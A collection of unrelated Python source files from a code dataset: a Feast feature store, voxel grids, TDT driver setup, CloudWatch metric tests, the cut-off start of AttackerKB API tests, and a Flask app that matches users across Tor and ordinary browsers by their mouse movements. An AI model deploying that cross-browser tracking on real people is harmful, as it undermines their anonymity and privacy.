from feast.infra.provider import Provider, get_provider
from feast.offline_store import (
RetrievalJob,
get_offline_store,
get_offline_store_for_retrieval,
)
from feast.protos.feast.types.EntityKey_pb2 import EntityKey as EntityKeyProto
from feast.protos.feast.types.Value_pb2 import Value as ValueProto
from feast.registry import Registry
from feast.repo_config import (
LocalOnlineStoreConfig,
OnlineStoreConfig,
RepoConfig,
load_repo_config,
)
from feast.type_map import python_value_to_proto_value
class FeatureStore:
"""
A FeatureStore object is used to define, create, and retrieve features.
"""
config: RepoConfig
def __init__(
self, repo_path: Optional[str] = None, config: Optional[RepoConfig] = None,
):
if repo_path is not None and config is not None:
raise ValueError("You cannot specify both repo_path and config")
if config is not None:
self.config = config
elif repo_path is not None:
self.config = load_repo_config(Path(repo_path))
else:
self.config = RepoConfig(
metadata_store="./metadata.db",
project="default",
provider="local",
online_store=OnlineStoreConfig(
local=LocalOnlineStoreConfig("online_store.db")
),
)
def _get_provider(self) -> Provider:
return get_provider(self.config)
def _get_registry(self) -> Registry:
return Registry(self.config.metadata_store)
def apply(self, objects: List[Union[FeatureView, Entity]]):
"""Register objects to metadata store and update related infrastructure.
The apply method registers one or more definitions (e.g., Entity, FeatureView) and registers or updates these
objects in the Feast registry. Once the registry has been updated, the apply method will update related
infrastructure (e.g., create tables in an online store) in order to reflect these new definitions. All
operations are idempotent, meaning they can safely be rerun.
Args: objects (List[Union[FeatureView, Entity]]): A list of FeatureView or Entity objects that should be
registered
Examples:
Register a single Entity and FeatureView.
>>> from feast.feature_store import FeatureStore
>>> from feast import Entity, FeatureView, Feature, ValueType, FileSource
>>> from datetime import timedelta
>>>
>>> fs = FeatureStore()
>>> customer_entity = Entity(name="customer", value_type=ValueType.INT64, description="customer entity")
>>> customer_feature_view = FeatureView(
>>> name="customer_fv",
>>> entities=["customer"],
>>> features=[Feature(name="age", dtype=ValueType.INT64)],
>>> input=FileSource(path="file.parquet", event_timestamp_column="timestamp"),
>>> ttl=timedelta(days=1)
>>> )
>>> fs.apply([customer_entity, customer_feature_view])
"""
# TODO: Add locking
# TODO: Optimize by only making a single call (read/write)
# TODO: Add infra update operation (currently we are just writing to registry)
registry = self._get_registry()
for ob in objects:
if isinstance(ob, FeatureView):
registry.apply_feature_view(ob, project=self.config.project)
elif isinstance(ob, Entity):
registry.apply_entity(ob, project=self.config.project)
else:
raise ValueError(
f"Unknown object type ({type(ob)}) provided as part of apply() call"
)
def get_historical_features(
self, entity_df: Union[pd.DataFrame, str], feature_refs: List[str],
) -> RetrievalJob:
"""Enrich an entity dataframe with historical feature values for either training or batch scoring.
This method joins historical feature data from one or more feature views to an entity dataframe by using a time
travel join.
Each feature view is joined to the entity dataframe using all entities configured for the respective feature
view. All configured entities must be available in the entity dataframe. Therefore, the entity dataframe must
contain all entities found in all feature views, but the individual feature views can have different entities.
Time travel is based on the configured TTL for each feature view. A shorter TTL will limit the
amount of scanning that will be done in order to find feature data for a specific entity key. Setting a short
TTL may result in null values being returned.
Args:
entity_df (Union[pd.DataFrame, str]): An entity dataframe is a collection of rows containing all entity
columns (e.g., customer_id, driver_id) on which features need to be joined, as well as a event_timestamp
column used to ensure point-in-time correctness. Either a Pandas DataFrame can be provided or a string
SQL query. The query must be of a format supported by the configured offline store (e.g., BigQuery)
feature_refs: A list of features that should be retrieved from the offline store. Feature references are of
the format "feature_view:feature", e.g., "customer_fv:daily_transactions".
Returns:
RetrievalJob which can be used to materialize the results.
Examples:
Retrieve historical features using a BigQuery SQL entity dataframe
>>> from feast.feature_store import FeatureStore
>>>
>>> fs = FeatureStore(config=RepoConfig(provider="gcp"))
>>> retrieval_job = fs.get_historical_features(
>>> entity_df="SELECT event_timestamp, order_id, customer_id from gcp_project.my_ds.customer_orders",
>>> feature_refs=["customer:age", "customer:avg_orders_1d", "customer:avg_orders_7d"]
>>> )
            >>> feature_data = retrieval_job.to_df()
>>> model.fit(feature_data) # insert your modeling framework here.
"""
registry = self._get_registry()
all_feature_views = registry.list_feature_views(project=self.config.project)
feature_views = _get_requested_feature_views(feature_refs, all_feature_views)
offline_store = get_offline_store_for_retrieval(feature_views)
job = offline_store.get_historical_features(
self.config, feature_views, feature_refs, entity_df
)
return job
def materialize(
self,
feature_views: Optional[List[str]],
start_date: datetime,
end_date: datetime,
) -> None:
"""
Materialize data from the offline store into the online store.
This method loads feature data in the specified interval from either
the specified feature views, or all feature views if none are specified,
into the online store where it is available for online serving.
Args:
feature_views (List[str]): Optional list of feature view names. If selected, will only run
materialization for the specified feature views.
start_date (datetime): Start date for time range of data to materialize into the online store
end_date (datetime): End date for time range of data to materialize into the online store
Examples:
Materialize all features into the online store over the interval
from 3 hours ago to 10 minutes ago.
>>> from datetime import datetime, timedelta
>>> from feast.feature_store import FeatureStore
>>>
>>> fs = FeatureStore(config=RepoConfig(provider="gcp"))
>>> fs.materialize(
>>> start_date=datetime.utcnow() - timedelta(hours=3),
>>> end_date=datetime.utcnow() - timedelta(minutes=10)
>>> )
"""
feature_views_to_materialize = []
registry = self._get_registry()
if feature_views is None:
feature_views_to_materialize = registry.list_feature_views(
self.config.project
)
else:
for name in feature_views:
feature_view = registry.get_feature_view(name, self.config.project)
feature_views_to_materialize.append(feature_view)
# TODO paging large loads
for feature_view in feature_views_to_materialize:
if isinstance(feature_view.input, FileSource):
raise NotImplementedError(
"This function is not yet implemented for File data sources"
)
if not feature_view.input.table_ref:
raise NotImplementedError(
f"This function is only implemented for FeatureViews with a table_ref; {feature_view.name} does not have one."
)
(
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
) = _run_reverse_field_mapping(feature_view)
offline_store = get_offline_store(self.config)
table = offline_store.pull_latest_from_table(
feature_view.input,
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
start_date,
end_date,
)
if feature_view.input.field_mapping is not None:
table = _run_forward_field_mapping(
table, feature_view.input.field_mapping
)
rows_to_write = _convert_arrow_to_proto(table, feature_view)
provider = self._get_provider()
provider.online_write_batch(
self.config.project, feature_view, rows_to_write
)
def _get_requested_feature_views(
feature_refs: List[str], all_feature_views: List[FeatureView]
) -> List[FeatureView]:
"""Get list of feature views based on feature references"""
feature_views_dict = {}
for ref in feature_refs:
ref_parts = ref.split(":")
found = False
for feature_view in all_feature_views:
if feature_view.name == ref_parts[0]:
found = True
feature_views_dict[feature_view.name] = feature_view
continue
if not found:
raise ValueError(f"Could not find feature view from reference {ref}")
feature_views_list = []
for view in feature_views_dict.values():
feature_views_list.append(view)
return feature_views_list
def _run_reverse_field_mapping(
feature_view: FeatureView,
) -> Tuple[List[str], List[str], str, Optional[str]]:
"""
If a field mapping exists, run it in reverse on the entity names,
feature names, event timestamp column, and created timestamp column
to get the names of the relevant columns in the BigQuery table.
Args:
feature_view: FeatureView object containing the field mapping
as well as the names to reverse-map.
Returns:
Tuple containing the list of reverse-mapped entity names,
reverse-mapped feature names, reverse-mapped event timestamp column,
and reverse-mapped created timestamp column that will be passed into
the query to the offline store.
"""
# if we have mapped fields, use the original field names in the call to the offline store
event_timestamp_column = feature_view.input.event_timestamp_column
entity_names = [entity for entity in feature_view.entities]
feature_names = [feature.name for feature in feature_view.features]
created_timestamp_column = feature_view.input.created_timestamp_column
if feature_view.input.field_mapping is not None:
reverse_field_mapping = {
v: k for k, v in feature_view.input.field_mapping.items()
}
event_timestamp_column = (
reverse_field_mapping[event_timestamp_column]
if event_timestamp_column in reverse_field_mapping.keys()
else event_timestamp_column
)
created_timestamp_column = (
reverse_field_mapping[created_timestamp_column]
if created_timestamp_column
and created_timestamp_column in reverse_field_mapping.keys()
else created_timestamp_column
)
entity_names = [
reverse_field_mapping[col] if col in reverse_field_mapping.keys() else col
for col in entity_names
]
feature_names = [
reverse_field_mapping[col] if col in reverse_field_mapping.keys() else col
for col in feature_names
]
return (
entity_names,
feature_names,
event_timestamp_column,
created_timestamp_column,
)
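# Worked example (hypothetical mapping, for illustration only): if the source table
# column "ts" is exposed to Feast as "event_timestamp" via
# field_mapping = {"ts": "event_timestamp"}, the reverse mapping computed above is
# {"event_timestamp": "ts"}, so the offline-store query selects the original "ts" column.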
def _run_forward_field_mapping(
table: pyarrow.Table, field_mapping: Dict[str, str],
) -> pyarrow.Table:
# run field mapping in the forward direction
cols = table.column_names
mapped_cols = [
field_mapping[col] if col in field_mapping.keys() else col for col in cols
]
table = table.rename_columns(mapped_cols)
return table
def _convert_arrow_to_proto(
table: pyarrow.Table, feature_view: FeatureView
) -> List[Tuple[EntityKeyProto, Dict[str, ValueProto], datetime, Optional[datetime]]]:
rows_to_write = []
for row in zip(*table.to_pydict().values()):
entity_key = EntityKeyProto()
for entity_name in feature_view.entities:
entity_key.entity_names.append(entity_name)
idx = table.column_names.index(entity_name)
value = python_value_to_proto_value(row[idx])
entity_key.entity_values.append(value)
feature_dict = {}
for feature in feature_view.features:
idx = table.column_names.index(feature.name)
value = python_value_to_proto_value(row[idx])
feature_dict[feature.name] = value
event_timestamp_idx = table.column_names.index(
feature_view.input.event_timestamp_column
)
event_timestamp = row[event_timestamp_idx]
if feature_view.input.created_timestamp_column is not None:
created_timestamp_idx = table.column_names.index(
feature_view.input.created_timestamp_column
)
created_timestamp = row[created_timestamp_idx]
else:
created_timestamp = None
rows_to_write.append(
(entity_key, feature_dict, event_timestamp, created_timestamp)
)
return rows_to_write
|
StarcoderdataPython
|
6425558
|
from typing import List, Optional, Tuple
import numpy as np
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
from .utils import discretize_points, offset_points, trilinear_interp
from .base import Explicit3D
from .._C.rep import _ext
MAX_DEPTH = 10000.0
class VoxelGrid(Explicit3D):
'''
Let's start with a simple voxel grid.
'''
def __init__(
self,
bbox: Tensor,
voxel_size: float,
use_corner: bool=True,
):
'''
bbox2voxel: https://github.com/facebookresearch/NSVF/fairnr/modules/encoder.py#L1053
bbox: array [min_x,y,z, max_x,y,z]
x represents center, O represents corner
O O O O O
x x x x
O O O O O
x x x x
O O O O O
Given a center x's coords [i,j,k]. its corners' coords are [i,j,k] + {0,1}^3
'''
super().__init__()
self.use_corner = use_corner
self.bbox = bbox
v_min, v_max = bbox[:3], bbox[3:]
steps = ((v_max - v_min) / voxel_size).round().long() + 1
# note the difference between torch.meshgrid and np.meshgrid.
center_coords = torch.stack(torch.meshgrid([torch.arange(s) for s in steps]), -1) # s_x,s_y,s_z,3
center_points = (center_coords * voxel_size + v_min).reshape(-1, 3) # start from lower bound
# self.register_buffer('center_coords', center_coords)
n_voxels = center_points.shape[0]
occupancy = torch.ones(n_voxels, dtype=torch.bool) # occupancy's length unchanges unless splitting
# corner points
if use_corner:
corner_shape = steps+1
n_corners = corner_shape.prod().item()
offset = offset_points().long() # [8, 3]
corner1d = torch.arange(n_corners).reshape(corner_shape.tolist())
center2corner = (center_coords[...,None,:] + offset).reshape(-1, 8, 3) # [..., 8,3]
center2corner = corner1d[center2corner[...,0], center2corner[...,1], center2corner[...,2]] # [..., 8]
self.register_buffer('center2corner', center2corner)
self.register_buffer('n_corners', torch.tensor(n_corners))
# keep min max voxels, for ray_intersection
max_ray_hit = min(steps.sum().item(), n_voxels)
# register_buffer for saving and loading.
self.register_buffer('occupancy', occupancy)
self.register_buffer('grid_shape', steps) # self.grid_shape = steps
self.register_buffer('center_points', center_points)
self.register_buffer('n_voxels', torch.tensor(n_voxels))
self.register_buffer('max_ray_hit', torch.tensor(max_ray_hit))
self.register_buffer('voxel_size', torch.tensor(voxel_size))
def ray_intersect(self, rays_o: Tensor, rays_d: Tensor):
'''
Args:
rays_o, Tensor, (N_rays, 3)
rays_d, Tensor, (N_rays, 3)
Return:
pts_idx, Tensor, (N_rays, max_hit)
t_near, t_far (N_rays, max_hit)
'''
pts_idx_1d, t_near, t_far = _ext.aabb_intersect(
rays_o.contiguous(), rays_d.contiguous(),
self.center_points.contiguous(), self.voxel_size, self.max_ray_hit)
t_near.masked_fill_(pts_idx_1d.eq(-1), MAX_DEPTH)
t_near, sort_idx = t_near.sort(dim=-1)
t_far = t_far.gather(-1, sort_idx)
pts_idx_1d = pts_idx_1d.gather(-1, sort_idx)
hits = pts_idx_1d.ne(-1).any(-1)
return pts_idx_1d, t_near, t_far, hits
# def get_corner_points(self, center_idx):
# corner_idx = self.center2corner[center_idx] # [..., 8]
# return self.corner_points[corner_idx] # [..., 8, 3]
def pruning(self, keep):
n_vox_left = keep.sum()
if n_vox_left > 0 and n_vox_left < keep.shape[0]:
self.center_points = self.center_points[keep].contiguous()
self.occupancy.masked_scatter_(self.occupancy, keep)
self.n_voxels = n_vox_left
self.max_ray_hit = self.get_max_ray_hit()
if self.use_corner:
c2corner_idx = self.center2corner[keep] # [..., 8]
corner_idx, center2corner = c2corner_idx.unique(sorted=True, return_inverse=True) # [.] and [..., 8]
self.center2corner = center2corner.contiguous()
self.n_corners = self.n_corners * 0 + corner_idx.shape[0]
return corner_idx
def splitting(self, feats: Optional[Tensor]=None):
offset = offset_points(device=self.center_points.device).long() # [8, 3] scale [0,1]
n_subvox = offset.shape[0] # 8
old_center_coords = discretize_points(self.center_points, self.voxel_size) # [N ,3]
self.voxel_size *= 0.5
half_voxel = self.voxel_size * 0.5
self.center_points = (self.center_points[:,None,:] + (offset*2-1) * half_voxel).reshape(-1, 3)
self.n_voxels = self.n_voxels * n_subvox
self.grid_shape = self.grid_shape * 2
self.occupancy = self.occupancy[...,None].repeat_interleave(n_subvox, -1).reshape(-1)
self.max_ray_hit = self.get_max_ray_hit()
if self.use_corner:
center_coords = (2*old_center_coords[...,None,:] + offset).reshape(-1, 3) # [8N, 3] # x2
# <==> discretize_points(self.center_points, self.voxel_size) # [8N ,3]
corner_coords = (center_coords[...,None,:] + offset).reshape(-1, 3) # [64N, 3]
unique_corners, center2corner = torch.unique(corner_coords, dim=0, sorted=True, return_inverse=True)
self.n_corners = self.n_corners * 0 + unique_corners.shape[0]
old_ct2cn = self.center2corner
self.center2corner = center2corner.reshape(-1, n_subvox)
if feats is not None:
cn2oldct = center2corner.new_zeros(self.n_corners).scatter_(
0, center2corner, torch.arange(corner_coords.shape[0], device=feats.device) // n_subvox**2)
feats_idx = old_ct2cn[cn2oldct] # [N_cn, 8]
_feats = feats[feats_idx] # [N_cn, 8, D_f]
new_feats = trilinear_interp(unique_corners-1, 2*old_center_coords[cn2oldct], _feats, 2., offset)
return new_feats
def get_max_ray_hit(self):
# keep min max voxels, for ray_intersection
min_voxel = self.center_points.min(0)[0]
max_voxel = self.center_points.max(0)[0]
aabb_box = ((max_voxel - min_voxel) / self.voxel_size).round().long() + 1
max_ray_hit = min(aabb_box.sum(), self.n_voxels)
return max_ray_hit
def load_adjustment(self, n_voxels, grid_shape):
self.center_points = self.center_points.new_empty(n_voxels, 3)
self.center2corner = self.center2corner.new_empty(n_voxels, 8)
self.occupancy = self.occupancy.new_empty(torch.tensor(grid_shape).prod())
def get_edge(self):
NotImplemented
# TODO
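# Illustrative sketch (not part of this module): how a voxel center at integer grid
# coords [i, j, k] enumerates its 8 corner coords [i, j, k] + {0, 1}^3, as described
# in the VoxelGrid docstring above.
import itertools

def _corner_coords_of_center(center=(2, 5, 1)):
    return [tuple(c + o for c, o in zip(center, offs))
            for offs in itertools.product((0, 1), repeat=3)]

# _corner_coords_of_center() -> [(2, 5, 1), (2, 5, 2), (2, 6, 1), ..., (3, 6, 2)]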
|
StarcoderdataPython
|
1825092
|
import json
import os
import sys
def get_installed_modules():
txt = []
for line in os.popen(f'"{sys.executable}" -m pip list --format json'):
txt.append(line)
if not txt:
return {}
data = {}
for (name, version) in map(lambda x: x.values(), json.loads("".join(txt))):
data[name.lower()] = version
return data
def get_require_modules(fp: str):
try:
# pip >=20
from pip._internal.network.session import PipSession # noqa
from pip._internal.req import parse_requirements # noqa
except ImportError:
try:
# 10.0.0 <= pip <= 19.3.1
from pip._internal.download import PipSession # noqa
from pip._internal.req import parse_requirements # noqa
except ImportError:
# pip <= 9.0.3
try:
from pip.download import PipSession
from pip.req import parse_requirements
except ImportError:
print("you should to upgrade your pip, `python -m pip install --upgrade pip`")
raise SystemExit
data = {}
session = PipSession()
for r in parse_requirements(fp, session):
if "://" in r.requirement:
continue
if "==" not in r.requirement: # must equals
raise ValueError("bad requirements")
(k, v) = r.requirement.split("==")
data[str(k.strip()).lower()] = v.strip()
return data
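# Usage sketch (hypothetical file contents, for illustration): given a requirements.txt
# containing the single line "requests==2.25.1",
#     get_require_modules("requirements.txt") -> {"requests": "2.25.1"}
# and get_installed_modules() returns the same {name: version} mapping for the
# packages reported by `pip list`.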
|
StarcoderdataPython
|
6554058
|
<filename>app.py
from flask import Flask, render_template, request, Response, make_response
from analysis.user_base import IDGenerator
from analysis.user_handling import UserCreator, UserHandler, UserPairHandler, all_matches
from config import PREVENT_SERVER_CRASH
app = Flask(__name__)
@app.route("/", methods=["GET"])
async def index():
new_user_id = IDGenerator.unique_id()
resp = make_response(render_template("website.html", userID=new_user_id))
return resp
def print_and_plot():
user = UserCreator(req=request).user()
user_handler = UserHandler(user=user)
user_handler.calc_and_store_metrics()
user_handler.insert_user()
user_handler.print_user()
UserPairHandler().insert_valid_user_pairs()
all_matches.print_user_pairs()
for user_pair in all_matches:
UserPairHandler().plot_and_save_user_pair(user_pair=user_pair)
def safe_print_and_plot():
try:
print_and_plot()
except Exception as e:
print(e)
return Response(status=400)
return Response(status=204)
@app.route("/store-txy", methods=["POST"])
async def store_mouse_position():
if PREVENT_SERVER_CRASH:
return safe_print_and_plot()
print_and_plot()
return Response(status=204)
@app.route("/users-correlated-to-me", methods=["GET"])
async def correlated_users():
return Response(status=404)
if __name__ == "__main__":
app.run(debug=True)
"""
HOW TO RUN IT
Run in terminal:
gunicorn -w 4 -b 0.0.0.0:65000 app:app
To run it normally with Tor and a normal browser you must:
a. port-forward port 65000 in your router (or any other port you aren't using)
b. find your IP
c. visit <your-IP>:65000
To test it locally using only a normal browser:
a. edit the config file to allow pair matching between non-Tor browsers
b. Open http://0.0.0.0:65000/ on two windows (not maximized)
c1. move mouse from one window into the other
c2. or alt-tab and move it
d. .. until matches are plotted.
Before re-running it, use:
killall gunicorn
"""
|
StarcoderdataPython
|
3509996
|
import sys
import numpy as np
import pdb
class StaticFns:
@staticmethod
def termination_fn(obs, act, next_obs):
assert len(obs.shape) == len(next_obs.shape) == len(act.shape) == 2
notdone = np.isfinite(next_obs).all(axis=-1) \
* (np.abs(next_obs[:,1]) <= .2)
done = ~notdone
done = done[:,None]
return done
|
StarcoderdataPython
|
6656854
|
<reponame>mgielda/hwt<gh_stars>0
from hwt.hdl.types.hdlType import HdlType
class HStream(HdlType):
"""
Stream is an abstract type. It is an array with unspecified size.
:ivar elmType: type of elements
"""
def __init__(self, elmType):
super(HStream, self).__init__()
self.elmType = elmType
def bit_length(self):
raise TypeError("Stream does not have constant size")
|
StarcoderdataPython
|
4920833
|
'''
Functions for loading the zBUS, PA5 and RPcoX drivers and connecting to the
specified device. In addition to loading the appropriate ActiveX driver, some
minimal configuration is done.
Network-aware proxies of the zBUS and RPcoX drivers have been written for
TDTPy. To connect to TDT hardware that is running on a remote computer, both
the :func:`connect_zbus` and :func:`connect_rpcox` functions take the address
of the server via a tuple (hostname, port)::
    connect_rpcox('RZ6', address=('tdt_server.cns.nyu.edu', 3333))
.. autofunction:: connect_zbus
.. autofunction:: connect_rpcox
.. autofunction:: connect_pa5
.. note::
The network-aware proxy code should be considered alpha stage. Although it
appears to work in our tests, we have not deployed this in our data
aqcuisition experiments.
'''
import os
import numpy as np
import ctypes
# Initialize
import pythoncom
import pywintypes
from .dsp_error import DSPError
from . import dsp_server, actxobjects
import logging
log = logging.getLogger(__name__)
def connect_pa5(interface='GB', device_id=1, address=None):
'''
Connect to the PA5
'''
debug_string = '%d via %s interface' % (device_id, interface)
log.debug(debug_string)
try:
pythoncom.CoInitialize()
if address is None:
driver = actxobjects.PA5x()
else:
driver = dsp_server.PA5NET(address)
if not driver.ConnectPA5(interface, device_id):
raise DSPError("PA5", "Connection failed")
log.debug("Connected to PA5")
return driver
except pywintypes.com_error:
raise ImportError('ActiveX drivers from TDT not installed')
def connect_zbus(interface='GB', address=None):
'''
Connect to the zBUS interface and set the zBUS A and zBUS B triggers to low
Parameters
----------
interface : {'GB', 'USB'}
Type of interface (depends on the card that you have from TDT). See the
TDT ActiveX documentation for clarification on which interface you
would be using if you are still unsure.
address : {None, (hostname, port)}
If None, loads the ActiveX drivers directly, otherwise connects to the
remote server specified by the hostname, port tuple.
'''
try:
pythoncom.CoInitialize()
if address is not None:
driver = dsp_server.zBUSNET(address)
else:
driver = actxobjects.ZBUSx()
if not driver.ConnectZBUS(interface):
raise DSPError("zBUS", "Connection failed")
log.debug("Connected to zBUS")
# zBUS trigger is set to high for record mode, so ensure that both
# triggers are initialized to low.
driver.zBusTrigA(0, 2, 10)
driver.zBusTrigB(0, 2, 10)
log.debug("Set zBusTrigA to low")
log.debug("Set zBusTrigB to low")
return driver
except pywintypes.com_error:
raise ImportError('ActiveX drivers from TDT not installed')
def connect_rpcox(name, interface='GB', device_id=1, address=None):
'''
Connect to the specifed device using the RPcoX driver
Note that the appropriate RPcoX.Connect method is called so you do not need
to perform that step in your code.
Parameters
----------
name : {'RZ6', 'RZ5', 'RP2', ... (any valid device string) }
Name of device (as defined by the corresponding RPcoX.Connect* method).
interface : {'GB', 'USB'}
Type of interface (depends on the card that you have from TDT). See the
TDT ActiveX documentation for clarification on which interface you
would be using if you are still unsure.
device_id : int (default 1)
Id of device in the rack. Only applicable if you have more than one of
the same device (e.g. two RX6 devices).
address : {None, (hostname, port)}
If None, loads the ActiveX drivers directly, otherwise connects to the
remote server specified by the hostname, port tuple.
'''
pythoncom.CoInitialize()
debug_string = '%s %d via %s interface' % (name, device_id, interface)
log.debug(debug_string)
if address is None:
driver = actxobjects.RPcoX()
else:
driver = dsp_server.RPcoXNET(address)
if not getattr(driver, 'Connect%s' % name)(interface, device_id):
raise DSPError(name, "Connection failed")
log.debug("Connected to %s", name)
return driver
def get_cof_path(circuit_name):
'''
Given relative path, returns absolute path to circuit file. The *.rcx
extension may be omitted.
'''
search_dirs = [os.path.join(os.path.dirname(__file__), 'components'),
os.getcwd(), ]
log.debug("Searching %r", search_dirs)
success = False
if not circuit_name.endswith('.rcx'):
circuit_name += '.rcx'
log.debug("Attempting to locate circuit %s", circuit_name)
for dir in search_dirs:
circuit_path = os.path.join(dir, circuit_name)
log.debug('Checking %s', circuit_path)
if os.path.exists(circuit_path):
success = True
break
if not success:
raise IOError("Could not find circuit %s" % circuit_name)
return circuit_path
def dtype_to_type_str(data_type):
'''
Convert Numpy dtype to the type string required by TDT's libraries
TDT's ActiveX ReadTagVEX and WriteTagVEX functions require the type string
to be one of I8, I16, I32 or F32. Any valid format for specify Numpy dtype
is supported.
>>> dtype_to_type_str(np.int32)
'I32'
>>> dtype_to_type_str(np.float32)
'F32'
>>> dtype_to_type_str('float32')
'F32'
>>> dtype_to_type_str('int8')
'I8'
If a certain type is not supported by TDT, a Value error is raised:
>>> dtype_to_type_str(np.float16)
Traceback (most recent call last):
...
ValueError: Unsupported Numpy dtype
'''
if np.issubdtype(data_type, np.integer):
type_code = 'I'
elif np.issubdtype(data_type, np.floating):
type_code = 'F'
else:
raise ValueError("Unsupported Numpy dtype")
# Since dtype.itemsize is the number of bytes, and the number in the TDT
# type string reflects bit number, we can translate it by multiplying by 8.
# Likewise, dtype.char is 'i' for integer and 'f' for floating point
# datatypes.
type_str = "{0}{1}".format(type_code, data_type.itemsize*8)
log.debug("%r TDT type string is %s", data_type, type_str)
if type_str not in ['F32', 'I32', 'I16', 'I8']:
raise ValueError("Unsupported dtype")
return type_str
def best_sf(data_type, range):
'''
Computes the optimal scaling factor for data compression
Parameters
----------
data_type
Data type that values are being compressed to
range : scalar or tuple
Expected data range. If scalar, assumes the value falls in the range
(-range, range)
'''
data_type = np.dtype(data_type)
try:
info = np.iinfo(data_type)
    except ValueError:  # np.iinfo raises ValueError for non-integer dtypes
info = np.finfo(data_type)
return info.max/np.abs(range).max()
def resolution(data_type, scaling_factor):
'''
Computes resolution for data type given scaling factor
Parameters
----------
data_type : dtype
Numpy data type (or string)
scaling_factor : float
Scaling factor applied to data
'''
data_type = np.dtype(data_type)
if np.issubdtype(data_type, np.integer):
return 1/float(scaling_factor)
else:
raise ValueError("Float data types not supported")
CTYPES_TO_NP = {
ctypes.c_char: np.int8,
ctypes.c_wchar: np.int16,
ctypes.c_byte: np.int8,
ctypes.c_ubyte: np.uint8,
ctypes.c_short: np.int16,
ctypes.c_ushort: np.uint16,
ctypes.c_int: np.int32,
ctypes.c_uint: np.int32,
ctypes.c_long: np.int32,
ctypes.c_ulong: np.int32,
ctypes.c_float: np.float32,
ctypes.c_double: np.float64,
}
# Reverse lookup
NP_TO_CTYPES = dict((np.dtype(v), k) for k, v in CTYPES_TO_NP.items())
def shmem_as_ndarray(raw_array):
'''
Create a ndarray wrapper around shared memory space
'''
address = raw_array._wrapper.get_address()
size = raw_array._wrapper.get_size()
dtype = CTYPES_TO_NP[raw_array._type_]
class NDArrayView(object):
pass
d = NDArrayView()
d.__array_interface__ = {
'data': (address, False),
'typestr': np.dtype('uint8').str,
'descr': np.dtype('uint8').descr,
'shape': (size,),
'strides': None,
'version': 3,
}
return np.asarray(d).view(dtype=dtype)
if __name__ == '__main__':
import doctest
doctest.testmod()
|
StarcoderdataPython
|
3304378
|
<gh_stars>1-10
import datetime
import time
import boto3
from unittest import TestCase
from mock import MagicMock
from src.cloudwatch_metrics_client.cloudwatch import CloudWatchSyncMetrics, CloudWatchSyncMetricReporter
class TestCloudwatch(TestCase):
def setUp(self) -> None:
boto3.client = MagicMock()
self.reporter = CloudWatchSyncMetricReporter(report_interval=None)
CloudWatchSyncMetrics.with_namespace('test_namespace').with_reporter(self.reporter)
CloudWatchSyncMetrics.setup_client()
def test_recording_metric(self):
CloudWatchSyncMetrics.put_metric(MetricName='test_metric', Value=100)
metrics = list(self.reporter.metrics.values())[0].to_repr()
self.assertEqual('test_metric', metrics['MetricName'])
self.assertEqual(100, metrics['Values'][0])
self.assertEqual(1, metrics['Counts'][0])
self.assertIsNone(metrics.get('Dimensions'))
self.assertIsInstance(metrics['Timestamp'], datetime.datetime)
def test_sync_decorator(self):
@CloudWatchSyncMetrics.monitored_task
def task():
time.sleep(0.1)
task()
metrics = self.reporter.statistics
repr = metrics['transaction?'].to_repr()
self.assertEqual('transaction', repr['MetricName'])
self.assertIsNone(repr.get('Dimensions'))
self.assertEqual(1, repr['StatisticValues']['SampleCount'])
self.assertLess(100000, repr['StatisticValues']['Sum'])
self.assertGreater(150000, repr['StatisticValues']['Sum'])
self.assertEqual('Microseconds', repr['Unit'])
def test_sync_decorator_with_dimensions(self):
def test():
task()
metrics = list(self.reporter.statistics.values())[0].to_repr()
self.assertEqual('transaction', metrics['MetricName'])
self.assertDictEqual({'Name': 'Test_Dimension', 'Value': 'ValueX'}, metrics['Dimensions'][0])
self.assertEqual(1, metrics['StatisticValues']['SampleCount'])
self.assertLess(100000, metrics['StatisticValues']['Sum'])
self.assertGreater(150000, metrics['StatisticValues']['Sum'])
self.assertEqual('Microseconds', metrics['Unit'])
task2()
metrics = list(self.reporter.statistics.values())[1].to_repr()
self.assertEqual('transaction', metrics['MetricName'])
self.assertDictEqual({'Name': 'Test_Dimension', 'Value': 'ValueY'}, metrics['Dimensions'][0])
self.assertEqual(1, metrics['StatisticValues']['SampleCount'])
self.assertLess(100000, metrics['StatisticValues']['Sum'])
self.assertGreater(150000, metrics['StatisticValues']['Sum'])
self.assertEqual('Microseconds', metrics['Unit'])
@CloudWatchSyncMetrics.monitored_task
def task():
CloudWatchSyncMetrics.with_monitored_dimension('Test_Dimension', 'ValueX')
time.sleep(0.1)
@CloudWatchSyncMetrics.monitored_task
def task2():
CloudWatchSyncMetrics.with_monitored_dimension('Test_Dimension', 'ValueY')
time.sleep(0.1)
test()
metrics = list(self.reporter.statistics.values())
self.assertEqual(2, len(metrics))
def test_reporter(self):
self.stored_kwargs = None
def put_data(**kwargs):
self.stored_kwargs = kwargs
return {'ResponseMetadata': {'HTTPStatusCode': 200}}
CloudWatchSyncMetrics.client = MagicMock()
CloudWatchSyncMetrics.client.put_metric_data = put_data
def test():
reporter = CloudWatchSyncMetricReporter(report_interval=0.5)
CloudWatchSyncMetrics.with_reporter(reporter)
reporter.run()
CloudWatchSyncMetrics.put_metric(MetricName='test_metric_2', Value=50)
self.assertIsNone(self.stored_kwargs)
time.sleep(0.7)
reporter.stop()
self.assertEqual('test_metric_2', self.stored_kwargs['MetricData'][0]['MetricName'])
self.assertEqual(50, self.stored_kwargs['MetricData'][0]['Values'][0])
self.assertEqual(1, self.stored_kwargs['MetricData'][0]['Counts'][0])
test()
|
StarcoderdataPython
|
8135929
|
from django.urls import path
from . import views
urlpatterns=[
path("",views.index,name="index"),
path("register",views.register,name="register"),
path("login",views.login,name="login"),
path("logout",views.logout,name="logout")
]
|
StarcoderdataPython
|
6475949
|
<reponame>busterb/attackerkb-api<filename>tests/test_read.py<gh_stars>1-10
import pytest
import os
from attackerkb_api import AttackerKB, ApiError
API_KEY = os.environ.get("API_KEY")
def test_api_fail():
with pytest.raises(ApiError):
api = AttackerKB(api_key="")
def test_api():
    # The client is reused by the tests below, so bind it at module scope.
    global api
    api = AttackerKB(api_key=API_KEY)
def test_single_topic():
result = api.get_single_topic('6685ce4d-9523-4078-92d3-f08418c9770a')
assert result['id'] == '6685ce4d-9523-4078-92d3-f08418c9770a'
def test_search_topic():
result = api.get_topics(name="CVE-2020-10560")
assert result[0]['id'] == "6f81bc44-c000-427d-b222-b64c29bda621"
def test_search_topic_params():
